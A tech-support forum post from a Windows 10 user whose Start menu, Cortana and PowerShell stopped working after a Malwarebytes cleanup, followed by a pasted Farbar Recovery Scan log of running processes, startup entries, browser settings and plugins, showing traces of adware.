Jump to content

Start Menu/Cortana/Powershell Win 10 wont run after Malwarebytes clean


Recommended Posts

I downloaded malwarebytes to get rid of a popup issue that I started having in the last week.  It was able to find and delete things that had merely been quarantined in the past.  I am considering a subscription as windows defender needs the backup.  

 

However, I have now discovered that on my machine after running Malwarebytes, my machine not working properly with no access to the Windows 10 start up menu (you can left click for the control panel controlled, but the regular click does nothing), in addition powershell does not complete loading and cortana will not respond.  

 

 

Actions I have already taken:  

  • Restarted the computer
  • Restarted explorer.exe
  • I tried to use the windows utility to check and repair all services - it found a few that it could not repair, but they appeared to all be display images.  I attached the items that were flagged in a document.
  •  I restored my computer to a point two months ago before my viral problems and before antimalware and everything worked well.

  • Viral popups started immediately and this one windows defender found them but could not correct.   

  • Re-downloaded and ran Malwarebytes and this time researched all the things that it suggested I delete (especially those in windows files) and deleted all that were suggested.  

  • Unfortunately, same problem reoccured and I cannot access the start menu/powershell/cortana

  • I ran Farbar Recovery and attached the logs below.

 

Remaining Malware issue:  m77.dnsqa.me  

 

 

 

I originally ran Adwcleaner before malwarebytes, but did not have this problem before doing that AND I did not rerun it after my system restore.

 

I attached the log from my first time around deleting all that was recommended.  Oddly enough there is NOT a log for when I did the same thing yesterday.  If you look at the malwarebites logs it is like the system restore never happened and I did not redownload the program.

 

My computer:  Window 10  Home Toshiba Satelite m630

 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

can result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by Lexi (administrator) on DURABLE (08-03-2016 12:22:47)
Running from C:\Users\Lexi\Downloads
Loaded Profiles: Lexi (Available Profiles: Lexi & DefaultAppPool)
Platform: Windows 10 Home (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RTKAUDIOSERVICE64.EXE
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\mqsvc.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Amazon.com) C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
(Symantec Corporation) C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatcher.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\BulletinBoard\TosNcCore.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
() C:\Program Files\TOSHIBA\FlashCards\Hotkey\TCrdKBB.exe
(FileThis) C:\Program Files (x86)\FileThis\FileThis Fetch\FileThis Fetch.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Amazon.com) C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe
(Audible, Inc.) C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe
(TOSHIBA CORPORATION.) C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe
(Orbiscom Ltd. All rights reserved.) C:\Program Files (x86)\Discover\SOAN\DiscoverSOAN.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe
(Amazon Digital Services, LLC.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe
(Orbiscom Ltd.) C:\Windows\SysWOW64\OBroker.exe
(LeapFrog Enterprises, Inc.) C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfimon.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\ControlCenter3\BrccMCtl.exe
(LG Electronics) C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe
(Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(PFU LIMITED) C:\Program Files (x86)\PFU\ScanSnap\SSFolder\SSFolderTray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Sun Microsystems, Inc.) C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\LocalServiceJre\bin\AmazonCloudDriveW.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TPHM\TPCHWMsg.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Farbar) C:\Users\Lexi\Downloads\FRST64 (1).exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [16174328 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1411840 2015-09-28] (Realtek Semiconductor)
HKLM\...\Run: [ThpSrv] => C:\windows\system32\thpsrv /logon
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [505696 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation)
HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [508216 2009-07-28] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [913720 2010-03-25] (TOSHIBA Corporation)
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1489760 2010-04-06] (TOSHIBA Corporation)
HKLM\...\Run: [TosWaitSrv] => C:\Program Files\TOSHIBA\TPHM\TosWaitSrv.exe [705368 2010-02-23] (TOSHIBA Corporation)
HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [238080 2009-10-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosVolRegulator] => C:\Program Files\TOSHIBA\TosVolRegulator\TosVolRegulator.exe [24376 2009-11-11] (TOSHIBA Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe [709976 2010-02-05] (TOSHIBA Corporation)
HKLM\...\Run: [TosNC] => C:\Program Files\Toshiba\BulletinBoard\TosNcCore.exe [595816 2010-03-19] (TOSHIBA Corporation)
HKLM\...\Run: [TosReelTimeMonitor] => C:\Program Files\TOSHIBA\ReelTime\TosReelTimeMonitor.exe [35672 2010-03-03] (TOSHIBA Corporation)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944648 2015-06-12] (Synaptics Incorporated)
HKLM-x32\...\Run: [KeNotify] => C:\Program Files (x86)\TOSHIBA\Utilities\KeNotify.exe [34160 2009-12-25] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [HWSetup] => C:\Program Files\TOSHIBA\Utilities\HWSetup.exe [423936 2010-03-04] (TOSHIBA Electronics, Inc.)
HKLM-x32\...\Run: [sVPWUTIL] => C:\Program Files (x86)\TOSHIBA\Utilities\SVPWUTIL.exe [352256 2010-02-22] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM-x32\...\Run: [TSleepSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe [252728 2010-03-17] (TOSHIBA)
HKLM-x32\...\Run: [NortonOnlineBackupReminder] => C:\Program Files (x86)\TOSHIBA\Toshiba Online Backup\Activation\TobuActivation.exe [529256 2009-08-10] (Toshiba)
HKLM-x32\...\Run: [secure Online Account Numbers] => C:\Program Files (x86)\Discover\SOAN\DiscoverSOAN.exe [376832 2010-03-05] (Orbiscom Ltd. All rights reserved.)
HKLM-x32\...\Run: [brMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [scanSnap WIA Service Checker] => C:\windows\SSDriver\fi5110\SsWiaChecker.exe
HKLM-x32\...\Run: [Monitor] => C:\Program Files (x86)\LeapFrog\LeapFrog Connect\Monitor.exe [118272 2014-07-11] (LeapFrog Enterprises, Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2011-07-05] (Apple Inc.)
HKLM-x32\...\Run: [bYRUA_AGENT] => C:\ProgramData\LGMOBILEAX\BYR_Client\VZWUAAgent.exe [380024 2012-09-24] (LG Electronics)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1085656 2015-12-13] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
HKLM\...\Policies\Explorer: [NoSetActiveDesktop] 0
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [GoogleChromeAutoLaunch_AC2BF96DE3E4AFDBE25411FD527B2AD1] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [874648 2016-03-01] (Google Inc.)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Run: [FileThis Fetch] => C:\Program Files (x86)\FileThis\FileThis Fetch\FileThis Fetch.exe [350208 2013-05-24] (FileThis)
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Policies\Explorer: [NoSetActiveDesktop] 0
AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll => No File
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Unbox.lnk [2012-12-12]
ShortcutTarget: Amazon Unbox.lnk -> C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientSystemTray.exe (Amazon.com)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Audible Download Manager.lnk [2010-09-24]
ShortcutTarget: Audible Download Manager.lnk -> C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe (Audible, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CardMinder Viewer.lnk [2011-07-19]
ShortcutTarget: CardMinder Viewer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\CardMinder\CardLauncher.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Conversion to PDF with ScanSnap Organizer.lnk [2011-07-19]
ShortcutTarget: Conversion to PDF with ScanSnap Organizer.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Organizer\PfuSsOrgOcrChk.exe (PFU LIMITED)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ScanSnap Manager.lnk [2013-05-28]
ShortcutTarget: ScanSnap Manager.lnk -> C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsMon.exe (PFU LIMITED)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Amazon Cloud Drive.lnk [2016-03-07]
ShortcutTarget: Amazon Cloud Drive.lnk -> C:\Users\Lexi\AppData\Local\Apps\2.0\2DJ030TV.4OO\2H60B505.COR\amaz..tion_f2fa081ea2183235_0002.0001_cb34a912a946f839\AmazonCloudDrive.exe (Amazon Digital Services, LLC.)
Startup: C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2015-07-31]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{0377792b-7629-45e2-ae76-3047b41ccf06}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{69348f7a-a204-4307-bdbe-d51a41143651}: [DhcpNameServer] 10.0.5.3 10.0.5.2
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSNA&bmod=TSNA
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Start Page Restore = hxxp://www.google.com/calendar/render?hl=en&tab=wc&gsessionid=pOBMFiDq2Uvgtsn9Tik9KQ
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://www.facebook.com/
hxxps://www.google.com/calendar/render?hl=en&tab=wc&pli=1&gsessionid=OK
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.google.com/ie
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com/ie
SearchScopes: HKLM -> DefaultScope {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKLM-x32 -> DefaultScope {B1243C39-DE64-4E02-BC80-265B7BD496B1} URL = 
SearchScopes: HKLM-x32 -> {9D2BF1CD-96EB-4EA4-9D12-EEAA66D4FC8D} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {23758B0B-0D9F-32A3-A476-D9B1033E7A1E} URL = hxxp://www.bing.com/search?q={searchTerms}&pc=ZUGO&form=ZGAIDF
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = 
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {57A65587-8AEC-4FF9-A3A3-32330322F26B} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSNA_enUS393US394
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {60C66211-88F6-486E-8303-B0B10E4FD293} URL = 
SearchScopes: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?q={SEARCHTERMS}&o=15527&l=dis&prt=360&chn=retail&geo=US&ver=4
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll [2013-07-29] (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll [2013-07-29] (Oracle Corporation)
BHO-x32: Secure Online Account Numbers Helper -> {435EAA86-D32B-484F-869C-53745FCB1642} -> C:\Program Files (x86)\Discover\SOAN\DiscoverSOANHelper.dll [2010-03-05] (Orbiscom Ltd. All rights reserved.)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-12-17] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Skype Plug-In -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-05-04] (Oracle Corporation)
BHO-x32: Google Gears Helper -> {E0FEFE40-FBF9-42AE-BA58-794CA7E3FB53} -> C:\Program Files (x86)\Google\Google Gears\Internet Explorer\0.5.36.0\gears.dll [2010-02-23] (Google Inc.)
BHO-x32: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll [2010-03-19] (<TOSHIBA>)
Toolbar: HKLM-x32 - Secure Online Account Numbers - {A8C7C2CA-6DFD-4E16-8458-592361564D38} - C:\Program Files (x86)\Discover\SOAN\DiscoverSOANToolbar.dll [2010-03-05] (Orbiscom Ltd. All rights reserved.)
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Toolbar: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001 -> No Name - {A13C2648-91D4-4BF3-BC6D-0079707C4389} -  No File
DPF: HKLM-x32 {2FF8D282-F78A-4A33-ABC2-49E72A341482} hxxp://riteaid.storefront.com/images/global/activex/SFImageUpload1_10.CAB
DPF: HKLM-x32 {C7DEDA04-2FFF-4B81-AE66-0A0E0EF4AD2F} hxxp://www.ritzpix.com/net/Uploader/LPUploader57.cab
Handler-x32: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22] (Skype Technologies S.A.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
 
FireFox:
========
FF ProfilePath: C:\Users\Lexi\AppData\Roaming\Mozilla\Firefox\Profiles\s9ln76d7.default-1398562510049
FF NewTab: about:newtab
FF DefaultSearchEngine: Search Provided by Yahoo
FF DefaultSearchEngine.US: Google
FF SelectedSearchEngine: Search Provided by Yahoo
FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/_freaudedtr_16_04&param1=1&param2=f%3D1%26b%3DFirefox%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzzzz0A0EtC0DyDyByB0E0B0C0CyDtC0FtN0D0Tzu0StCyEzzzztN1L2XzutAtFtCyBtFzytFtDtN1L1Czu1BtAtN1L1G1B1V1N2Y1L1Qzu2StByE0E0E0C0E0E0EtGtC0CyD0FtGtDyEyEyCtGtByByDyEtGyEyEyB0FyD0B0FyByDyCyB0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2StA0B0DzytD0DtDyEtG0F0E0ByEtGyE0AtD0AtGzy0FyEtCtGyC0Fzyzy0CzztDzytDyE0AtD2QtN0A0LzuyE%26cr%3D561344303%26a%3Dwncy_freaudedtr_16_04%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-10] ()
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\windows\system32\npDeployJava1.dll [2013-07-29] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2013-07-29] (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-10] ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2013-01-11] (Foxit Corporation)
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\windows\SysWOW64\npDeployJava1.dll [2013-07-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.5.1 -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll [2012-05-04] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-09-23] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-12-17] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2574262253-2623044021-4024016403-1001: amazon.com/AmazonMP3DownloaderPlugin -> C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin1017300.dll [2012-08-28] (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol400.dll [2010-12-14] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPcol500.dll [2010-12-14] (Catalina Marketing Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll [2011-08-24] (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll [2011-08-24] (Apple Inc.)
